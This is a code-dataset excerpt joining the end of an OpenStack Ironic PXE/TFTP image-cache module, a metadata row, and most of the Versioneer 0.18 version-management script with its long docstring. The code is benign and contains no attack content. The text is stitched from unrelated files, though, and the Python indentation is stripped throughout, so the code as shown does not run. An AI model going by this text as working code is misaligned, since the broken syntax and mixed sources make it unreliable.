ks_cfg = ks_cfg + ks_config_drive
utils.write_to_file(image_info['ks_cfg'][1], ks_cfg)
@image_cache.cleanup(priority=25)
class TFTPImageCache(image_cache.ImageCache):
def __init__(self):
master_path = CONF.pxe.tftp_master_path or None
super(TFTPImageCache, self).__init__(
master_path,
# MiB -> B
cache_size=CONF.pxe.image_cache_size * 1024 * 1024,
# min -> sec
cache_ttl=CONF.pxe.image_cache_ttl * 60)
def cache_ramdisk_kernel(task, pxe_info, ipxe_enabled=False):
"""Fetch the necessary kernels and ramdisks for the instance."""
ctx = task.context
node = task.node
t_pxe_info = copy.copy(pxe_info)
if ipxe_enabled:
path = os.path.join(get_ipxe_root_dir(), node.uuid)
else:
path = os.path.join(get_root_dir(), node.uuid)
fileutils.ensure_tree(path)
    # anaconda deploy will have 'stage2' as one of the labels in pxe_info dict
if 'stage2' in pxe_info.keys():
# stage2 will be stored in ipxe http directory. So make sure they
# exist.
fileutils.ensure_tree(
get_file_path_from_label(
node.uuid,
get_ipxe_root_dir(),
'stage2'
)
)
# ks_cfg is rendered later by the driver using ks_template. It cannot
# be fetched and cached.
t_pxe_info.pop('ks_cfg')
LOG.debug("Fetching necessary kernel and ramdisk for node %s",
node.uuid)
deploy_utils.fetch_images(ctx, TFTPImageCache(), list(t_pxe_info.values()),
CONF.force_raw_images)
def clean_up_pxe_env(task, images_info, ipxe_enabled=False):
"""Cleanup PXE environment of all the images in images_info.
Cleans up the PXE environment for the mentioned images in
images_info.
:param task: a TaskManager object
:param images_info: A dictionary of images whose keys are the image names
to be cleaned up (kernel, ramdisk, etc) and values are a tuple of
identifier and absolute path.
"""
for label in images_info:
path = images_info[label][1]
ironic_utils.unlink_without_raise(path)
clean_up_pxe_config(task, ipxe_enabled=ipxe_enabled)
TFTPImageCache().clean_up()
| apache-2.0 | -485,594,768,924,118,500 | 41.092563 | 178 | 0.61622 | false |
jseabold/statsmodels | versioneer.py | 2 | 68638 |
# Version: 0.18
"""The Versioneer - like a rocketeer, but for versions.
The Versioneer
==============
* like a rocketeer, but for versions!
* https://github.com/warner/python-versioneer
* Brian Warner
* License: Public Domain
* Compatible With: python2.6, 2.7, 3.2, 3.3, 3.4, 3.5, 3.6, and pypy
* [![Latest Version]
(https://pypip.in/version/versioneer/badge.svg?style=flat)
](https://pypi.python.org/pypi/versioneer/)
* [![Build Status]
(https://travis-ci.org/warner/python-versioneer.png?branch=master)
](https://travis-ci.org/warner/python-versioneer)
This is a tool for managing a recorded version number in distutils-based
python projects. The goal is to remove the tedious and error-prone "update
the embedded version string" step from your release process. Making a new
release should be as easy as recording a new tag in your version-control
system, and maybe making new tarballs.
## Quick Install
* `pip install versioneer` to somewhere in your $PATH
* add a `[versioneer]` section to your setup.cfg (see below)
* run `versioneer install` in your source tree, commit the results
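A minimal `[versioneer]` section, with illustrative values (adjust the paths
and prefixes to your project), might look like:
    [versioneer]
    VCS = git
    style = pep440
    versionfile_source = src/myproject/_version.py
    versionfile_build = myproject/_version.py
    tag_prefix = v
    parentdir_prefix = myproject-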
## Version Identifiers
Source trees come from a variety of places:
* a version-control system checkout (mostly used by developers)
* a nightly tarball, produced by build automation
* a snapshot tarball, produced by a web-based VCS browser, like github's
"tarball from tag" feature
* a release tarball, produced by "setup.py sdist", distributed through PyPI
Within each source tree, the version identifier (either a string or a number,
this tool is format-agnostic) can come from a variety of places:
* ask the VCS tool itself, e.g. "git describe" (for checkouts), which knows
about recent "tags" and an absolute revision-id
* the name of the directory into which the tarball was unpacked
* an expanded VCS keyword ($Id$, etc)
* a `_version.py` created by some earlier build step
For released software, the version identifier is closely related to a VCS
tag. Some projects use tag names that include more than just the version
string (e.g. "myproject-1.2" instead of just "1.2"), in which case the tool
needs to strip the tag prefix to extract the version identifier. For
unreleased software (between tags), the version identifier should provide
enough information to help developers recreate the same tree, while also
giving them an idea of roughly how old the tree is (after version 1.2, before
version 1.3). Many VCS systems can report a description that captures this,
for example `git describe --tags --dirty --always` reports things like
"0.7-1-g574ab98-dirty" to indicate that the checkout is one revision past the
0.7 tag, has a unique revision id of "574ab98", and is "dirty" (it has
uncommitted changes).
The version identifier is used for multiple purposes:
* to allow the module to self-identify its version: `myproject.__version__`
* to choose a name and prefix for a 'setup.py sdist' tarball
## Theory of Operation
Versioneer works by adding a special `_version.py` file into your source
tree, where your `__init__.py` can import it. This `_version.py` knows how to
dynamically ask the VCS tool for version information at import time.
`_version.py` also contains `$Revision$` markers, and the installation
process marks `_version.py` to have this marker rewritten with a tag name
during the `git archive` command. As a result, generated tarballs will
contain enough information to get the proper version.
To allow `setup.py` to compute a version too, a `versioneer.py` is added to
the top level of your source tree, next to `setup.py` and the `setup.cfg`
that configures it. This overrides several distutils/setuptools commands to
compute the version when invoked, and changes `setup.py build` and `setup.py
sdist` to replace `_version.py` with a small static file that contains just
the generated version data.
## Installation
See [INSTALL.md](./INSTALL.md) for detailed installation instructions.
## Version-String Flavors
Code which uses Versioneer can learn about its version string at runtime by
importing `_version` from your main `__init__.py` file and running the
`get_versions()` function. From the "outside" (e.g. in `setup.py`), you can
import the top-level `versioneer.py` and run `get_versions()`.
Both functions return a dictionary with different flavors of version
information:
* `['version']`: A condensed version string, rendered using the selected
style. This is the most commonly used value for the project's version
string. The default "pep440" style yields strings like `0.11`,
`0.11+2.g1076c97`, or `0.11+2.g1076c97.dirty`. See the "Styles" section
below for alternative styles.
* `['full-revisionid']`: detailed revision identifier. For Git, this is the
full SHA1 commit id, e.g. "1076c978a8d3cfc70f408fe5974aa6c092c949ac".
* `['date']`: Date and time of the latest `HEAD` commit. For Git, it is the
commit date in ISO 8601 format. This will be None if the date is not
available.
* `['dirty']`: a boolean, True if the tree has uncommitted changes. Note that
this is only accurate if run in a VCS checkout, otherwise it is likely to
be False or None
* `['error']`: if the version string could not be computed, this will be set
to a string describing the problem, otherwise it will be None. It may be
useful to throw an exception in setup.py if this is set, to avoid e.g.
creating tarballs with a version string of "unknown".
Some variants are more useful than others. Including `full-revisionid` in a
bug report should allow developers to reconstruct the exact code being tested
(or indicate the presence of local changes that should be shared with the
developers). `version` is suitable for display in an "about" box or a CLI
`--version` output: it can be easily compared against release notes and lists
of bugs fixed in various releases.
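As an illustration only (every value here is hypothetical), a call to
`get_versions()` might return:
    {'version': '0.11+2.g1076c97',
     'full-revisionid': '1076c978a8d3cfc70f408fe5974aa6c092c949ac',
     'dirty': False,
     'error': None,
     'date': '2018-03-01T12:34:56+0000'}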
The installer adds the following text to your `__init__.py` to place a basic
version in `YOURPROJECT.__version__`:
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
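From `setup.py`, a typical (illustrative) use of the top-level module is:
    import versioneer
    setup(version=versioneer.get_version(),
          cmdclass=versioneer.get_cmdclass(),
          ...)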
## Styles
The setup.cfg `style=` configuration controls how the VCS information is
rendered into a version string.
The default style, "pep440", produces a PEP440-compliant string, equal to the
un-prefixed tag name for actual releases, and containing an additional "local
version" section with more detail for in-between builds. For Git, this is
TAG[+DISTANCE.gHEX[.dirty]] , using information from `git describe --tags
--dirty --always`. For example "0.11+2.g1076c97.dirty" indicates that the
tree is like the "1076c97" commit but has uncommitted changes (".dirty"), and
that this commit is two revisions ("+2") beyond the "0.11" tag. For released
software (exactly equal to a known tag), the identifier will only contain the
stripped tag, e.g. "0.11".
Other styles are available. See [details.md](details.md) in the Versioneer
source tree for descriptions.
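As a rough illustration (exact strings depend on repository state), a checkout
two commits past tag 0.11 at abbreviated hash 1076c97 renders as:
    pep440:            0.11+2.g1076c97
    pep440-pre:        0.11.post.dev2
    pep440-post:       0.11.post2+g1076c97
    pep440-old:        0.11.post2
    git-describe:      0.11-2-g1076c97
    git-describe-long: 0.11-2-g1076c97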
## Debugging
Versioneer tries to avoid fatal errors: if something goes wrong, it will tend
to return a version of "0+unknown". To investigate the problem, run `setup.py
version`, which will run the version-lookup code in a verbose mode, and will
display the full contents of `get_versions()` (including the `error` string,
which may help identify what went wrong).
## Known Limitations
Some situations are known to cause problems for Versioneer. This details the
most significant ones. More can be found on Github
[issues page](https://github.com/warner/python-versioneer/issues).
### Subprojects
Versioneer has limited support for source trees in which `setup.py` is not in
the root directory (e.g. `setup.py` and `.git/` are *not* siblings). There are
two common reasons why `setup.py` might not be in the root:
* Source trees which contain multiple subprojects, such as
[Buildbot](https://github.com/buildbot/buildbot), which contains both
"master" and "slave" subprojects, each with their own `setup.py`,
`setup.cfg`, and `tox.ini`. Projects like these produce multiple PyPI
distributions (and upload multiple independently-installable tarballs).
* Source trees whose main purpose is to contain a C library, but which also
provide bindings to Python (and perhaps other languages) in subdirectories.
Versioneer will look for `.git` in parent directories, and most operations
should get the right version string. However `pip` and `setuptools` have bugs
and implementation details which frequently cause `pip install .` from a
subproject directory to fail to find a correct version string (so it usually
defaults to `0+unknown`).
`pip install --editable .` should work correctly. `setup.py install` might
work too.
Pip-8.1.1 is known to have this problem, but hopefully it will get fixed in
some later version.
[Bug #38](https://github.com/warner/python-versioneer/issues/38) is tracking
this issue. The discussion in
[PR #61](https://github.com/warner/python-versioneer/pull/61) describes the
issue from the Versioneer side in more detail.
[pip PR#3176](https://github.com/pypa/pip/pull/3176) and
[pip PR#3615](https://github.com/pypa/pip/pull/3615) contain work to improve
pip to let Versioneer work correctly.
Versioneer-0.16 and earlier only looked for a `.git` directory next to the
`setup.cfg`, so subprojects were completely unsupported with those releases.
### Editable installs with setuptools <= 18.5
`setup.py develop` and `pip install --editable .` allow you to install a
project into a virtualenv once, then continue editing the source code (and
test) without re-installing after every change.
"Entry-point scripts" (`setup(entry_points={"console_scripts": ..})`) are a
convenient way to specify executable scripts that should be installed along
with the python package.
These both work as expected when using modern setuptools. When using
setuptools-18.5 or earlier, however, certain operations will cause
`pkg_resources.DistributionNotFound` errors when running the entrypoint
script, which must be resolved by re-installing the package. This happens
when the install happens with one version, then the egg_info data is
regenerated while a different version is checked out. Many setup.py commands
cause egg_info to be rebuilt (including `sdist`, `wheel`, and installing into
a different virtualenv), so this can be surprising.
[Bug #83](https://github.com/warner/python-versioneer/issues/83) describes
this one, but upgrading to a newer version of setuptools should probably
resolve it.
### Unicode version strings
While Versioneer works (and is continually tested) with both Python 2 and
Python 3, it is not entirely consistent with bytes-vs-unicode distinctions.
Newer releases probably generate unicode version strings on py2. It's not
clear that this is wrong, but it may be surprising for applications when they
write these strings to a network connection or include them in bytes-oriented
APIs like cryptographic checksums.
[Bug #71](https://github.com/warner/python-versioneer/issues/71) investigates
this question.
## Updating Versioneer
To upgrade your project to a new release of Versioneer, do the following:
* install the new Versioneer (`pip install -U versioneer` or equivalent)
* edit `setup.cfg`, if necessary, to include any new configuration settings
indicated by the release notes. See [UPGRADING](./UPGRADING.md) for details.
* re-run `versioneer install` in your source tree, to replace
`SRC/_version.py`
* commit any changed files
## Future Directions
This tool is designed to make it easily extended to other version-control
systems: all VCS-specific components are in separate directories like
src/git/ . The top-level `versioneer.py` script is assembled from these
components by running make-versioneer.py . In the future, make-versioneer.py
will take a VCS name as an argument, and will construct a version of
`versioneer.py` that is specific to the given VCS. It might also take the
configuration arguments that are currently provided manually during
installation by editing setup.py . Alternatively, it might go the other
direction and include code from all supported VCS systems, reducing the
number of intermediate scripts.
## License
To make Versioneer easier to embed, all its code is dedicated to the public
domain. The `_version.py` that it creates is also in the public domain.
Specifically, both are released under the Creative Commons "Public Domain
Dedication" license (CC0-1.0), as described in
https://creativecommons.org/publicdomain/zero/1.0/ .
"""
from __future__ import print_function
try:
import configparser
except ImportError:
import ConfigParser as configparser
import errno
import json
import os
import re
import subprocess
import sys
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_root():
"""Get the project root directory.
We require that all commands are run from the project root, i.e. the
directory that contains setup.py, setup.cfg, and versioneer.py .
"""
root = os.path.realpath(os.path.abspath(os.getcwd()))
setup_py = os.path.join(root, "setup.py")
versioneer_py = os.path.join(root, "versioneer.py")
if not (os.path.exists(setup_py) or os.path.exists(versioneer_py)):
# allow 'python path/to/setup.py COMMAND'
root = os.path.dirname(os.path.realpath(os.path.abspath(sys.argv[0])))
setup_py = os.path.join(root, "setup.py")
versioneer_py = os.path.join(root, "versioneer.py")
if not (os.path.exists(setup_py) or os.path.exists(versioneer_py)):
err = ("Versioneer was unable to run the project root directory. "
"Versioneer requires setup.py to be executed from "
"its immediate directory (like 'python setup.py COMMAND'), "
"or in a way that lets it use sys.argv[0] to find the root "
"(like 'python path/to/setup.py COMMAND').")
raise VersioneerBadRootError(err)
try:
# Certain runtime workflows (setup.py install/develop in a setuptools
# tree) execute all dependencies in a single python process, so
# "versioneer" may be imported multiple times, and python's shared
# module-import table will cache the first one. So we cannot use
# os.path.dirname(__file__), as that will find whichever
# versioneer.py was first imported, even in later projects.
me = os.path.realpath(os.path.abspath(__file__))
me_dir = os.path.normcase(os.path.splitext(me)[0])
vsr_dir = os.path.normcase(os.path.splitext(versioneer_py)[0])
if me_dir != vsr_dir:
print("Warning: build in %s is using versioneer.py from %s"
% (os.path.dirname(me), versioneer_py))
except NameError:
pass
return root
def get_config_from_root(root):
"""Read the project setup.cfg file to determine Versioneer config."""
# This might raise EnvironmentError (if setup.cfg is missing), or
# configparser.NoSectionError (if it lacks a [versioneer] section), or
# configparser.NoOptionError (if it lacks "VCS="). See the docstring at
# the top of versioneer.py for instructions on writing your setup.cfg .
setup_cfg = os.path.join(root, "setup.cfg")
parser = configparser.SafeConfigParser()
with open(setup_cfg, "r") as f:
parser.readfp(f)
VCS = parser.get("versioneer", "VCS") # mandatory
def get(parser, name):
if parser.has_option("versioneer", name):
return parser.get("versioneer", name)
return None
cfg = VersioneerConfig()
cfg.VCS = VCS
cfg.style = get(parser, "style") or ""
cfg.versionfile_source = get(parser, "versionfile_source")
cfg.versionfile_build = get(parser, "versionfile_build")
cfg.tag_prefix = get(parser, "tag_prefix")
if cfg.tag_prefix in ("''", '""'):
cfg.tag_prefix = ""
cfg.parentdir_prefix = get(parser, "parentdir_prefix")
cfg.verbose = get(parser, "verbose")
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
# these dictionaries contain VCS-specific tools
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False,
env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None, None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
print("stdout was %s" % stdout)
return None, p.returncode
return stdout, p.returncode
LONG_VERSION_PY['git'] = '''
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.18 (https://github.com/warner/python-versioneer)
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "%(DOLLAR)sFormat:%%d%(DOLLAR)s"
git_full = "%(DOLLAR)sFormat:%%H%(DOLLAR)s"
git_date = "%(DOLLAR)sFormat:%%ci%(DOLLAR)s"
keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "%(STYLE)s"
cfg.tag_prefix = "%(TAG_PREFIX)s"
cfg.parentdir_prefix = "%(PARENTDIR_PREFIX)s"
cfg.versionfile_source = "%(VERSIONFILE_SOURCE)s"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False,
env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %%s" %% dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %%s" %% (commands,))
return None, None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %%s (error)" %% dispcmd)
print("stdout was %%s" %% stdout)
return None, p.returncode
return stdout, p.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for i in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None, "date": None}
else:
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print("Tried directories %%s but none started with prefix %%s" %%
(str(rootdirs), parentdir_prefix))
raise NotThisMethod("rootdir does not start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we do not want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %%d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%%s', no digits" %% ",".join(refs - tags))
if verbose:
print("likely tags: %%s" %% ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %%s" %% r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None,
"date": date}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags", "date": None}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py has not already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root,
hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %%s not under git control" %% root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there is not one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%%s*" %% tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%%s'"
%% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%%s' does not start with prefix '%%s'"
print(fmt %% (full_tag, tag_prefix))
pieces["error"] = ("tag '%%s' does not start with prefix '%%s'"
%% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%%ci", "HEAD"],
cwd=root)[0].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
"""Return a + if we do not already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%%d.g%%s" %% (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%%d.g%%s" %% (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%%d" %% pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%%d" %% pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you should not be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%%d" %% pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%%s" %% pieces["short"]
else:
# exception #1
rendered = "0.post%%d" %% pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%%s" %% pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
    Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%%d" %% pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%%d" %% pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%%d-g%%s" %% (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
    Like 'git describe --tags --dirty --always --long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%%d-g%%s" %% (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"],
"date": None}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%%s'" %% style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None,
"date": pieces.get("date")}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations do not do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split('/'):
root = os.path.dirname(root)
except NameError:
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree",
"date": None}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to compute version", "date": None}
'''
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we do not want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
